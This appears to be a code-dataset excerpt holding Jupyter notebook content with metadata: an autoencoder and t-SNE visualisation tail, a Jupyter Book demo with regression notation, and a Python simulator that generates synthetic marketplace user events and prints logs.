mae: 0.0544\nEpoch 9/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0199 - mae: 0.0538\nEpoch 10/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0196 - mae: 0.0533\n" ] ], [ [ "## 학습된 결과 확인", "_____no_output_____" ] ], [ [ "y_pred = ae(train_images)", "_____no_output_____" ], [ "import ipywidgets as widgets\n\ndef io_imshow(idx):\n print('GT label:', train_labels[idx])\n plt.subplot(121)\n plt.imshow(train_images[idx,:,:,0])\n plt.subplot(122)\n plt.imshow(y_pred[idx,:,:,0])\n plt.show()\n\nwidgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));", "_____no_output_____" ] ], [ [ "## 인코더 결과값 확인", "_____no_output_____" ] ], [ [ "z = enc(train_images)\ny_pred = dec(z)", "_____no_output_____" ], [ "import ipywidgets as widgets\n\ndef z_show(idx):\n print(z[idx])\n print('GT label:', train_labels[idx])\n\nwidgets.interact(z_show, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1));", "_____no_output_____" ] ], [ [ "## TSNE를 통해 인코더 결과값(7,7,8) 분포 가시화\nn_dim이 2일 때보다 좀 더 discriminative한 분포를 갖게 되었다.", "_____no_output_____" ] ], [ [ "from sklearn.manifold import TSNE\n\nmodel = TSNE(learning_rate=100)\ntransformed = model.fit_transform(z)\n\nxs = transformed[:,0]\nys = transformed[:,1]\nplt.scatter(xs,ys,c=train_labels)\n\nplt.show()\n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1fbf98baa7f613fcf682fa8efd421aeb9ec2f2
157,081
ipynb
Jupyter Notebook
seminar_skript/notebooks.ipynb
nitram-bot/fhnw_lecture
201009fdb695d52db5aa44d8d0e80b52cf9db6c0
[ "Apache-2.0" ]
null
null
null
seminar_skript/notebooks.ipynb
nitram-bot/fhnw_lecture
201009fdb695d52db5aa44d8d0e80b52cf9db6c0
[ "Apache-2.0" ]
2
2021-05-20T13:55:10.000Z
2022-02-26T06:47:34.000Z
seminar_skript/notebooks.ipynb
nitram-bot/fhnw_lecture
201009fdb695d52db5aa44d8d0e80b52cf9db6c0
[ "Apache-2.0" ]
null
null
null
755.197115
151,496
0.948905
[ [ [ "\n# Content with notebooks\n\nYou can also create content with Jupyter Notebooks. This means that you can include\ncode blocks and their outputs in your book.\n\n## Markdown + notebooks\n\nAs it is markdown, you can embed images, HTML, etc into your posts!\n\n![](https://myst-parser.readthedocs.io/en/latest/_static/logo.png)\n![](logo.png)\n\nYou can also $add_{math}$ and\n\n$$\nmath^{blocks}\n$$\n\nor\n\n$$\n\\begin{aligned}\n\\mbox{mean} la_{tex} \\\\ \\\\\nmath blocks\n\\end{aligned}\n$$\n\nBut make sure you \\$Escape \\$your \\$dollar signs \\$you want to keep!\n\n## MyST markdown\n\nMyST markdown works in Jupyter Notebooks as well. For more information about MyST markdown, check\nout [the MyST guide in Jupyter Book](https://jupyterbook.org/content/myst.html),\nor see [the MyST markdown documentation](https://myst-parser.readthedocs.io/en/latest/).\n\n## Code blocks and outputs\n\nJupyter Book will also embed your code blocks and output in your book.\nFor example, here's some sample Matplotlib code:", "_____no_output_____" ] ], [ [ "from matplotlib import rcParams, cycler\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.ion()", "_____no_output_____" ], [ "# Fixing random state for reproducibility\nnp.random.seed(19680801)\n\nN = 10\ndata = [np.logspace(0, 1, 100) + np.random.randn(100) + ii for ii in range(N)]\ndata = np.array(data).T\ncmap = plt.cm.coolwarm\nrcParams['axes.prop_cycle'] = cycler(color=cmap(np.linspace(0, 1, N)))\n\n\nfrom matplotlib.lines import Line2D\ncustom_lines = [Line2D([0], [0], color=cmap(0.), lw=4),\n Line2D([0], [0], color=cmap(.5), lw=4),\n Line2D([0], [0], color=cmap(1.), lw=4)]\n\nfig, ax = plt.subplots(figsize=(10, 5))\nlines = ax.plot(data)\nax.legend(custom_lines, ['Cold', 'Medium', 'Hot']);", "_____no_output_____" ] ], [ [ "There is a lot more that you can do with outputs (such as including interactive outputs)\nwith your book. For more information about this, see [the Jupyter Book documentation](https://jupyterbook.org)", "_____no_output_____" ], [ "Next, we can include the constant term $a$ into the vector $b$. This is done by adding an all-ones column to $\\mathbf{X}$: \n \n\\begin{equation*}\n \\begin{bmatrix}\n y_1\\\\\n y_2\\\\\n . \\\\\n . \\\\\n . \\\\\n y_i\n \\end{bmatrix}\n =\n \\begin{bmatrix}\n 1& x_{11} & x_{21} & x_{31} & \\ldots & x_{p1}\\\\\n 1 & x_{12} & x_{22} & x_{32} & \\ldots & x_{p2}\\\\\n &\\ldots&\\ldots&\\ldots&\\ldots&\\ldots\\\\\n &\\ldots&\\ldots&\\ldots&\\ldots&\\ldots\\\\\n 1& x_{1i} & x_{2i} & x_{3i} & \\ldots & x_{pi}\n \\end{bmatrix}\n \\cdot\n \\begin{bmatrix}\n a\\\\\n b_1\\\\\n b_2\\\\\n .\\\\\n .\\\\\n b_p\n \\end{bmatrix}\n\\end{equation*}", "_____no_output_____" ], [ "\\begin{align*}\n y_1&=a+b_1\\cdot x_{11}+b_2\\cdot x_{21}+\\cdots + b_p\\cdot x_{p1}\\\\\n y_2&=a+b_1\\cdot x_{12}+b_2\\cdot x_{22}+\\cdots + b_p\\cdot x_{p2}\\\\\n \\ldots& \\ldots\\\\\n y_i&=a+b_1\\cdot x_{1i}+b_2\\cdot x_{2i}+\\cdots + b_p\\cdot x_{pi}\\\\\n\\end{align*}", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ] ]
cb1fcb6f693a93ca4699f82cbdfcd38e20cfc314
71,495
ipynb
Jupyter Notebook
synthetic_datasets/model.ipynb
dzianissokalau/data_generator
20776e7b96a2600c6efa5417b9f02ea42b7e881a
[ "MIT" ]
null
null
null
synthetic_datasets/model.ipynb
dzianissokalau/data_generator
20776e7b96a2600c6efa5417b9f02ea42b7e881a
[ "MIT" ]
null
null
null
synthetic_datasets/model.ipynb
dzianissokalau/data_generator
20776e7b96a2600c6efa5417b9f02ea42b7e881a
[ "MIT" ]
null
null
null
39.434639
145
0.536919
[ [ [ "import numpy as np\nfrom datetime import datetime, timedelta\nimport time", "_____no_output_____" ], [ "# some probabilities should be dynamics, for example:\n# buying probability depends on the number of available items\n# listing probability increases if user has sold something in the past\n# probability of churn increases if user hasn't listed + hasn't bought anything + doesn't have anything in the basket\n# instead of using random choise for time, we should use distribution (exponential, binomial, normal etc)\nevents = {\n 'visit': {\n 'condition': True,\n 'inputs': 'timestamp',\n 'time': [0, 20],\n 'next_events': ['search', 'list_item', 'do_nothing'],\n 'probabilities': [0.6, 0.05, 0.35]\n },\n 'create_account': {\n 'time': [30, 150],\n 'next_events': ['search', 'list_item', 'do_nothing'],\n 'probabilities': [0.8, 0.1, 0.1] \n },\n 'list_item': {\n 'conditions': ['registered'],\n 'time': [90, 300],\n 'next_events': ['search', 'list_item', 'do_nothing'],\n 'probabilities': [0.1, 0.3, 0.6] \n },\n 'search': {\n 'time': [10, 120],\n 'next_events': ['search', 'view_item', 'list_item', 'do_nothing'],\n 'probabilities': [0.35, 0.5, 0.01, 0.14] \n },\n 'view_item': {\n 'time': [10, 30],\n 'next_events': ['view_item', 'send_message', 'search', 'add_to_basket', 'list_item', 'do_nothing'],\n 'probabilities': [0.4, 0.1, 0.2, 0.1, 0.01, 0.19] \n },\n 'send_message': {\n 'conditions': ['registered'],\n 'time': [10, 30],\n 'next_events': ['view_item', 'search', 'add_to_basket', 'do_nothing'],\n 'probabilities': [0.5, 0.25, 0.05, 0.2] \n },\n 'read_message': {\n 'conditions': ['n_unread_messages > 0'],\n 'time': [1, 10],\n 'next_events': ['answer', 'search', 'list_item', 'do_nothing'],\n 'probabilities': [0.8, 0.1, 0.01, 0.09] \n }, \n 'answer': {\n 'conditions': ['n_read_messages > 0'],\n 'time': [5, 120],\n 'next_events': ['search', 'list_item', 'do_nothing'],\n 'probabilities': [0.3, 0.01, 0.69] \n }, \n 'add_to_basket': {\n 'conditions': ['registered'],\n 'time': [5, 120],\n 'next_events': ['search', 'view_item', 'open_basket', 'do_nothing'],\n 'probabilities': [0.2, 0.2, 0.45, 0.15] \n },\n 'open_basket': {\n 'conditions': ['n_items_in_basket > 0'],\n 'time': [5, 120],\n 'next_events': ['search', 'remove_from_basket', 'pay', 'list_item', 'do_nothing'],\n 'probabilities': [0.05, 0.35, 0.45, 0.01, 0.15] \n },\n 'remove_from_basket': {\n 'conditions': ['n_items_in_basket > 0'],\n 'time': [1, 20],\n 'next_events': ['search', 'remove_from_basket', 'pay', 'do_nothing'],\n 'probabilities': [0.2, 0.2, 0.2, 0.4] \n },\n 'pay': {\n 'conditions': ['registered', 'n_items_in_basket > 0'],\n 'time': [180, 1800],\n 'next_events': ['search', 'do_nothing'],\n 'probabilities': [0.1, 0.9] \n },\n 'do_nothing': {}\n}", "_____no_output_____" ], [ "def create_event_data(event_name, user_id, timestamp, properties=None):\n d = {\n 'event_name': event_name,\n 'user_id': user_id,\n 'timestamp': timestamp\n }\n \n if properties is not None:\n for p in properties.keys():\n d[p] = properties\n \n return d", "_____no_output_____" ], [ "users = dict()\nitems = dict()\nmessages = dict()", "_____no_output_____" ], [ "class Item:\n def __init__(self, item_id, lister_id, listing_date):\n self.item_id = item_id\n self.lister_id = lister_id\n self.listing_date = listing_date\n self.status = 'active'\n \n\n \n\nclass Message:\n def __init__(self, sender_id, recepient_id, message_id, timestamp):\n self.sender_id = sender_id\n self.recepient_id = recepient_id\n self.message_id = message_id\n self.timestamp = timestamp", "_____no_output_____" ], [ "current_date = datetime(2021,4,18,23,10,11)", "_____no_output_____" ], [ "class User:\n def __init__(self, name, user_id):\n self.name = name\n self.user_id = user_id\n self.registered = False\n\n \n \n satisfaction_impact = {\n 'registration': 10,\n 'message_sent': 1,\n 'message_read': 1,\n 'list_item': 10,\n 'purchase': 20,\n 'sale': 20,\n 'delete_item': -20,\n 'days_listed': -1,\n 'search': -1,\n 'item_view': -1\n }\n \n \n \n @property\n def visit_probability(self):\n \"\"\"Calculate visit_probability as combination of initial probability and satisfaction level and other factor.\n \"\"\"\n probability_visit_from_satisfaction = 0.01 + self.satisfaction / 1000\n \n if probability_visit_from_satisfaction < 0:\n probability_visit_from_satisfaction = 0\n elif probability_visit_from_satisfaction > 0.05:\n probability_visit_from_satisfaction = 0.05\n \n probability_visit_from_messages = self.n_unread_messages * 0.2\n \n if probability_visit_from_messages > 0.6:\n probability_visit_from_messages = 0.6\n \n probability_visit_total = probability_visit_from_satisfaction + probability_visit_from_messages\n\n return probability_visit_total\n \n \n \n @property\n def satisfaction(self):\n \"\"\"Calculate user satisfaction level.\n \"\"\"\n satisfaction = 0\n \n if self.registered:\n satisfaction += self.satisfaction_impact['registration']\n \n if hasattr(self, 'messages_sent'):\n satisfaction += self.n_messages_sent * self.satisfaction_impact['message_sent']\n\n if hasattr(self, 'messages_read'):\n satisfaction += self.n_messages_read * self.satisfaction_impact['message_read']\n\n if hasattr(self, 'n_listed_items'):\n satisfaction += self.n_listed_items * self.satisfaction_impact['list_item'] \n \n if hasattr(self, 'n_purchases'):\n satisfaction += self.n_purchases * self.satisfaction_impact['purchase'] \n \n if hasattr(self, 'n_sold_items'):\n satisfaction += self.n_sold_items * self.satisfaction_impact['sale'] \n\n if hasattr(self, 'item_views'):\n satisfaction += self.item_views * self.satisfaction_impact['item_view'] \n \n if hasattr(self, 'searches'):\n satisfaction += self.searches * self.satisfaction_impact['search'] \n \n if hasattr(self, 'n_deleted_items'):\n satisfaction += self.n_deleted_items * self.satisfaction_impact['delete_item'] \n \n if hasattr(self, 'active_items'):\n for item_id in self.active_items:\n satisfaction += (current_date - items[item_id].listing_date).days * self.satisfaction_impact['days_listed'] \n \n return satisfaction\n \n \n\n @property\n def listing_index(self):\n if self.n_sold_items > 0:\n index = self.n_sold_items / self.n_listed_items / 0.5\n elif self.n_listed_items:\n index = 1 - self.n_listed_items * 0.1 if self.n_listed_items <= 10 else 0\n else:\n index = 1\n \n return index\n\n \n \n @property\n def items_in_basket(self):\n \"\"\"Calculate items in basket\n \"\"\"\n return len(self.basket) if hasattr(self, 'basket') else 0\n \n \n \n @property\n def unread_messages(self):\n \"\"\"Get list of unread messages\n \"\"\"\n received_messages = self.messages_received if hasattr(self, 'messages_received') else []\n read_messages = self.read_messages if hasattr(self, 'read_messages') else []\n unread_messages = list(set(received_messages) - set(read_messages))\n \n return unread_messages\n \n \n \n @property\n def n_listed_items(self):\n \"\"\"Calculate number of listed items\n \"\"\"\n return len(self.listed_items) if hasattr(self, 'listed_items') else 0 \n \n \n \n @property\n def n_active_items(self):\n \"\"\"Calculate number of active items\n \"\"\"\n return len(self.active_items) if hasattr(self, 'active_items') else 0 \n\n \n \n @property\n def n_deleted_items(self):\n \"\"\"Calculate number of deleted items\n \"\"\"\n return len(self.deleted_items) if hasattr(self, 'deleted_items') else 0 \n \n \n \n @property\n def n_items_in_basket(self):\n \"\"\"Calculate number of deleted items\n \"\"\"\n return len(self.basket) if hasattr(self, 'basket') else 0 \n \n \n\n @property\n def n_sold_items(self):\n \"\"\"Calculate number of sold items\n \"\"\"\n return len(self.sold_items) if hasattr(self, 'sold_items') else 0 \n \n \n\n @property\n def n_purchases(self):\n \"\"\"Calculate number of purchased items\n \"\"\"\n return len(self.purchased_items) if hasattr(self, 'purchased_items') else 0 \n\n\n \n @property\n def n_messages_sent(self):\n \"\"\"Calculate number of sent messages\n \"\"\"\n return len(self.messages_sent) if hasattr(self, 'messages_sent') else 0 \n\n\n \n @property\n def n_messages_received(self):\n \"\"\"Calculate number of received messages\n \"\"\"\n return len(self.messages_received) if hasattr(self, 'messages_received') else 0 \n\n\n \n @property\n def n_unread_messages(self):\n \"\"\"Calculate number of received messages\n \"\"\"\n return len(self.unread_messages) if hasattr(self, 'unread_messages') else 0 \n\n \n \n @property\n def n_read_messages(self):\n \"\"\"Calculate number of read messages\n \"\"\"\n return len(self.messages_read) if hasattr(self, 'messages_read') else 0 \n \n\n \n def visit(self, platform, country, timestamp):\n \"\"\"User visit event. \n It's the first touch with the app within a session.\n Event creates / updates user attributes:\n visits: number of visits.\n last_visit: time of the last visit.\n last_activity: time of the last activity.\n last_properties: properties like platform and country.\n \n Parameters:\n timestamp: time of the event.\n platform: platform of the visit: 'ios', 'android', 'web'.\n country: country code of the visit: 'US', 'DE', 'GB' etc.\n \"\"\"\n self.active_session = True\n self.last_event = 'visit'\n self.last_activity = timestamp\n self.visits = self.visits + 1 if hasattr(self, 'visits') else 1\n self.last_visit = timestamp\n \n self.last_properties = {\n 'platform': platform,\n 'country': country\n }\n \n print(self.last_event, timestamp)\n \n\n \n def create_account(self, timestamp):\n \"\"\"User creates an account. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'create_account'\n self.last_activity = timestamp\n self.registered = True\n self.registration_date = timestamp\n \n print(self.last_event, timestamp)\n \n \n \n def send_message(self, timestamp):\n \"\"\"User sends message to another user. \n Parameters:\n recepient_id: id of the user who receives the message.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'send_message'\n self.last_activity = timestamp\n \n # create message id\n recepient_id = items[self.open_item].lister_id\n message_id = hash(str(self.user_id) + str(recepient_id) + str(timestamp))\n \n # add messages to user attributes\n if hasattr(self, 'messages_sent'):\n self.messages_sent.append(message_id)\n else:\n self.messages_sent = [message_id]\n \n # store data to messages dict\n messages[message_id] = Message(sender_id=self.user_id, \n recepient_id=recepient_id, \n message_id=message_id, \n timestamp=timestamp) \n \n # update recepient attributes\n if hasattr(users[recepient_id], 'messages_received'):\n users[recepient_id].messages_received.append(message_id)\n else: \n users[recepient_id].messages_received = [message_id] \n \n print(self.last_event, timestamp)\n \n \n \n def read_message(self, timestamp):\n \"\"\"User reads message from another user. \n Parameters:\n message_id: id of the message.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'read_message'\n self.last_activity = timestamp\n \n rand = np.random.default_rng(seed=abs(hash(timestamp)))\n message_id = rand.choice(a=self.unread_messages)\n self.unread_messages.remove(message_id)\n \n # store message to user's read messages\n if hasattr(self, 'read_messages'):\n self.read_messages.append(message_id)\n else:\n self.read_messages = [message_id]\n \n print(self.last_event, timestamp)\n\n \n\n def answer(self, timestamp):\n \"\"\"User reads message from another user. \n Parameters:\n message_id: id of the message.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'answer'\n self.last_activity = timestamp\n \n # get sender_id who will be recepient of the next message\n message_id = self.read_messages[-1]\n recepient_id = messages[message_id].sender_id\n \n # create new message_id\n new_message_id = hash(str(self.user_id) + str(recepient_id) + str(timestamp))\n\n # add messages to user attributes\n if hasattr(self, 'messages_sent'):\n self.messages_sent.append(new_message_id)\n else:\n self.messages_sent = [new_message_id]\n \n # store data to messages dict\n messages[message_id] = Message(sender_id=self.user_id, \n recepient_id=recepient_id, \n message_id=new_message_id, \n timestamp=timestamp) \n \n # update recepient attributes\n if hasattr(users[recepient_id], 'messages_received'):\n users[recepient_id].messages_received.append(message_id)\n else: \n users[recepient_id].messages_received = [message_id]\n \n print(self.last_event, timestamp)\n \n\n\n def list_item(self, timestamp):\n \"\"\"User lists an item. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'list_item'\n self.last_activity = timestamp\n \n item_id = hash(str(self.user_id) + str(timestamp))\n \n if hasattr(self, 'listed_items'):\n self.listed_items.append(item_id)\n else:\n self.listed_items = [item_id]\n\n if hasattr(self, 'active_items'):\n self.active_items.append(item_id)\n else:\n self.active_items = [item_id]\n\n items[item_id] = Item(item_id=item_id, \n lister_id=self.user_id, \n listing_date=timestamp)\n \n print(self.last_event, timestamp)\n \n \n \n def search(self, timestamp):\n \"\"\"User performs a search. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'search'\n self.searches = self.searches + 1 if hasattr(self, 'searches') else 1\n self.last_activity = timestamp\n \n rand = np.random.default_rng(seed=abs(hash(timestamp)))\n self.available_items = rand.choice(a=list(items.keys()), size=20 if len(items.keys())>=20 else len(items.keys()), replace=False)\n\n print(self.last_event, timestamp)\n \n \n \n def view_item(self, timestamp):\n \"\"\"User views an item. \n Parameters:\n timestamp: time of the event.\n \"\"\" \n self.last_event = 'view_item'\n self.last_activity = timestamp\n self.item_views = self.item_views + 1 if hasattr(self, 'item_views') else 1\n \n rand = np.random.default_rng(seed=abs(hash(timestamp)))\n item_id = rand.choice(a=self.available_items)\n self.open_item = item_id\n items[item_id].views = items[item_id].views + 1 if hasattr(items[item_id], 'views') else 1\n \n print(self.last_event, timestamp)\n \n \n \n def add_to_basket(self, timestamp):\n \"\"\"User adds an item to the basket. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'add_to_basket'\n self.last_activity = timestamp\n \n if hasattr(self, 'basket'):\n self.basket.append(self.open_item)\n else:\n self.basket = [self.open_item]\n \n print(self.last_event, timestamp)\n\n \n \n def open_basket(self, timestamp):\n \"\"\"User adds an item to the basket. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'open_basket'\n self.last_activity = timestamp\n \n print(self.last_event, timestamp)\n \n \n \n def remove_from_basket(self, timestamp):\n \"\"\"User removes an item to the basket. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'remove_from_basket'\n self.last_activity = timestamp\n \n rand = np.random.default_rng(seed=abs(hash(timestamp)))\n item_id = rand.choice(a=self.basket)\n self.basket.remove(item_id)\n \n print(self.last_event, timestamp)\n \n \n \n def pay(self, timestamp):\n \"\"\"User pays for item / set of items. \n Parameters:\n item_id: id of the item user views.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'pay'\n self.last_activity = timestamp\n \n for item_id in self.basket: \n # updateitems attributes\n items[item_id].status = 'sold'\n items[item_id].buyer = self.user_id\n items[item_id].date_sold = timestamp\n \n # update lister's attributes\n lister_id = items[item_id].lister_id\n users[lister_id].active_items.remove(item_id)\n \n if hasattr(users[lister_id], 'sold_items'):\n users[lister_id].sold_items.append(item_id)\n else:\n users[lister_id].sold_items = [item_id]\n \n # update buyer's attributes\n if hasattr(self, 'purchased_items'):\n self.purchased_items.extend(self.basket)\n else:\n self.purchased_items = self.basket\n \n # empy basket\n self.basket = []\n \n print(self.last_event, timestamp)\n\n\n\n def delete_items(self, item_id, timestamp):\n \"\"\"User removes an item. \n Parameters:\n item_id: id of the item user views.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'delete_items'\n self.last_activity = timestamp\n self.active_items.remove(item_id)\n items[item_id].status = 'deleted'\n items[item_id].date_deleted = timestamp\n \n if hasattr(self, 'deleted_items'):\n self.deleted_items.append(item_id)\n else:\n self.deleted_items = [item_id]\n\n \n \n def do_nothing(self, timestamp):\n self.active_session = False", "_____no_output_____" ], [ "def session(user_id, timestamp):\n if user_id not in users.keys():\n users[user_id] = User(name=str(user_id), user_id='user_id')\n \n users[user_id].visit(timestamp=timestamp, platform='ios', country='DE')\n \n # number of the event\n n = 0\n \n while users[user_id].active_session:\n last_event = users[user_id].last_event\n \n next_events = events[last_event]['next_events'].copy()\n probabilities = events[last_event]['probabilities'].copy()\n \n \n # adjust registration probability\n if users[user_id].registered == False and 'create_account' not in next_events:\n # add registration as potential event\n next_events.append('create_account')\n probabilities = [prob * 0.8 for prob in probabilities]\n probabilities.append(0.2)\n\n \n # adjust open basket probability\n if users[user_id].n_items_in_basket > 0 and users[user_id].last_event != 'open_basket' and 'open_basket' not in next_events:\n next_events.append('open_basket')\n probabilities = [prob * 0.8 for prob in probabilities]\n probabilities.append(0.2)\n \n\n # adjust read_message probability\n if users[user_id].n_unread_messages > 0:\n # add read_message as potential event\n next_events.append('read_message')\n probabilities = [prob * 0.2 for prob in probabilities]\n probabilities.append(0.8)\n \n \n # adjust listing probability\n if 'list_item' in next_events:\n index = next_events.index('list_item')\n probabilities[index] = probabilities[index] * users[user_id].listing_index \n \n \n # with every event probability of do nothing grows\n if 'do_nothing' in next_events:\n index = next_events.index('do_nothing')\n probabilities[index] = probabilities[index] * (1 + n/100)\n \n \n # check condition for every event\n for event in next_events:\n if 'conditions' in events[event]:\n for condition in events[event]['conditions']:\n if eval(f'users[user_id].{condition}') == False:\n index = next_events.index(event)\n next_events.remove(event)\n probabilities.pop(index) \n break\n \n \n # normalize probabilities\n total_p = sum(probabilities)\n probabilities = [p/total_p for p in probabilities]\n probabilities[0] = probabilities[0] + 1-sum(probabilities) \n \n rand = np.random.default_rng(seed=timestamp.minute*60+timestamp.second+user_id)\n next_event = rand.choice(a=next_events, p=probabilities)\n \n \n time_delta = int(rand.integers(low=events[last_event]['time'][0], high=events[last_event]['time'][1]))\n timestamp = timestamp + timedelta(seconds=time_delta)\n \n eval(f'users[user_id].{next_event}(timestamp=timestamp)')\n n += 1", "_____no_output_____" ], [ "# create initial set of items\nusers[1] = User(name='first user', user_id=1)\n\nstart_date = datetime.now() - timedelta(days=10)\nusers[1].create_account(timestamp=start_date)\n\nfor i in range(100):\n users[1].list_item(timestamp=start_date + timedelta(seconds=i+1) + timedelta(minutes=i+1))", "create_account 2021-04-08 23:11:37.686658\nlist_item 2021-04-08 23:12:38.686658\nlist_item 2021-04-08 23:13:39.686658\nlist_item 2021-04-08 23:14:40.686658\nlist_item 2021-04-08 23:15:41.686658\nlist_item 2021-04-08 23:16:42.686658\nlist_item 2021-04-08 23:17:43.686658\nlist_item 2021-04-08 23:18:44.686658\nlist_item 2021-04-08 23:19:45.686658\nlist_item 2021-04-08 23:20:46.686658\nlist_item 2021-04-08 23:21:47.686658\nlist_item 2021-04-08 23:22:48.686658\nlist_item 2021-04-08 23:23:49.686658\nlist_item 2021-04-08 23:24:50.686658\nlist_item 2021-04-08 23:25:51.686658\nlist_item 2021-04-08 23:26:52.686658\nlist_item 2021-04-08 23:27:53.686658\nlist_item 2021-04-08 23:28:54.686658\nlist_item 2021-04-08 23:29:55.686658\nlist_item 2021-04-08 23:30:56.686658\nlist_item 2021-04-08 23:31:57.686658\nlist_item 2021-04-08 23:32:58.686658\nlist_item 2021-04-08 23:33:59.686658\nlist_item 2021-04-08 23:35:00.686658\nlist_item 2021-04-08 23:36:01.686658\nlist_item 2021-04-08 23:37:02.686658\nlist_item 2021-04-08 23:38:03.686658\nlist_item 2021-04-08 23:39:04.686658\nlist_item 2021-04-08 23:40:05.686658\nlist_item 2021-04-08 23:41:06.686658\nlist_item 2021-04-08 23:42:07.686658\nlist_item 2021-04-08 23:43:08.686658\nlist_item 2021-04-08 23:44:09.686658\nlist_item 2021-04-08 23:45:10.686658\nlist_item 2021-04-08 23:46:11.686658\nlist_item 2021-04-08 23:47:12.686658\nlist_item 2021-04-08 23:48:13.686658\nlist_item 2021-04-08 23:49:14.686658\nlist_item 2021-04-08 23:50:15.686658\nlist_item 2021-04-08 23:51:16.686658\nlist_item 2021-04-08 23:52:17.686658\nlist_item 2021-04-08 23:53:18.686658\nlist_item 2021-04-08 23:54:19.686658\nlist_item 2021-04-08 23:55:20.686658\nlist_item 2021-04-08 23:56:21.686658\nlist_item 2021-04-08 23:57:22.686658\nlist_item 2021-04-08 23:58:23.686658\nlist_item 2021-04-08 23:59:24.686658\nlist_item 2021-04-09 00:00:25.686658\nlist_item 2021-04-09 00:01:26.686658\nlist_item 2021-04-09 00:02:27.686658\nlist_item 2021-04-09 00:03:28.686658\nlist_item 2021-04-09 00:04:29.686658\nlist_item 2021-04-09 00:05:30.686658\nlist_item 2021-04-09 00:06:31.686658\nlist_item 2021-04-09 00:07:32.686658\nlist_item 2021-04-09 00:08:33.686658\nlist_item 2021-04-09 00:09:34.686658\nlist_item 2021-04-09 00:10:35.686658\nlist_item 2021-04-09 00:11:36.686658\nlist_item 2021-04-09 00:12:37.686658\nlist_item 2021-04-09 00:13:38.686658\nlist_item 2021-04-09 00:14:39.686658\nlist_item 2021-04-09 00:15:40.686658\nlist_item 2021-04-09 00:16:41.686658\nlist_item 2021-04-09 00:17:42.686658\nlist_item 2021-04-09 00:18:43.686658\nlist_item 2021-04-09 00:19:44.686658\nlist_item 2021-04-09 00:20:45.686658\nlist_item 2021-04-09 00:21:46.686658\nlist_item 2021-04-09 00:22:47.686658\nlist_item 2021-04-09 00:23:48.686658\nlist_item 2021-04-09 00:24:49.686658\nlist_item 2021-04-09 00:25:50.686658\nlist_item 2021-04-09 00:26:51.686658\nlist_item 2021-04-09 00:27:52.686658\nlist_item 2021-04-09 00:28:53.686658\nlist_item 2021-04-09 00:29:54.686658\nlist_item 2021-04-09 00:30:55.686658\nlist_item 2021-04-09 00:31:56.686658\nlist_item 2021-04-09 00:32:57.686658\nlist_item 2021-04-09 00:33:58.686658\nlist_item 2021-04-09 00:34:59.686658\nlist_item 2021-04-09 00:36:00.686658\nlist_item 2021-04-09 00:37:01.686658\nlist_item 2021-04-09 00:38:02.686658\nlist_item 2021-04-09 00:39:03.686658\nlist_item 2021-04-09 00:40:04.686658\nlist_item 2021-04-09 00:41:05.686658\nlist_item 2021-04-09 00:42:06.686658\nlist_item 2021-04-09 00:43:07.686658\nlist_item 2021-04-09 00:44:08.686658\nlist_item 2021-04-09 00:45:09.686658\nlist_item 2021-04-09 00:46:10.686658\nlist_item 2021-04-09 00:47:11.686658\nlist_item 2021-04-09 00:48:12.686658\nlist_item 2021-04-09 00:49:13.686658\nlist_item 2021-04-09 00:50:14.686658\nlist_item 2021-04-09 00:51:15.686658\nlist_item 2021-04-09 00:52:16.686658\nlist_item 2021-04-09 00:53:17.686658\n" ], [ "# create events for the first users\nfor i in range(2,101):\n print('\\nUSER: {}'.format(i))\n users[i] = User(name='{} user'.format(i), user_id=i)\n session(user_id=i, timestamp=start_date + timedelta(minutes=300+i) + timedelta(seconds=i))", "\nUSER: 2\nvisit 2021-04-09 04:13:39.686658\ncreate_account 2021-04-09 04:13:42.686658\nsearch 2021-04-09 04:15:55.686658\nview_item 2021-04-09 04:17:19.686658\n\nUSER: 3\nvisit 2021-04-09 04:14:40.686658\n\nUSER: 4\nvisit 2021-04-09 04:15:41.686658\n\nUSER: 5\nvisit 2021-04-09 04:16:42.686658\nsearch 2021-04-09 04:16:56.686658\nview_item 2021-04-09 04:17:58.686658\nsearch 2021-04-09 04:18:12.686658\nview_item 2021-04-09 04:19:33.686658\nview_item 2021-04-09 04:19:52.686658\n\nUSER: 6\nvisit 2021-04-09 04:17:43.686658\ncreate_account 2021-04-09 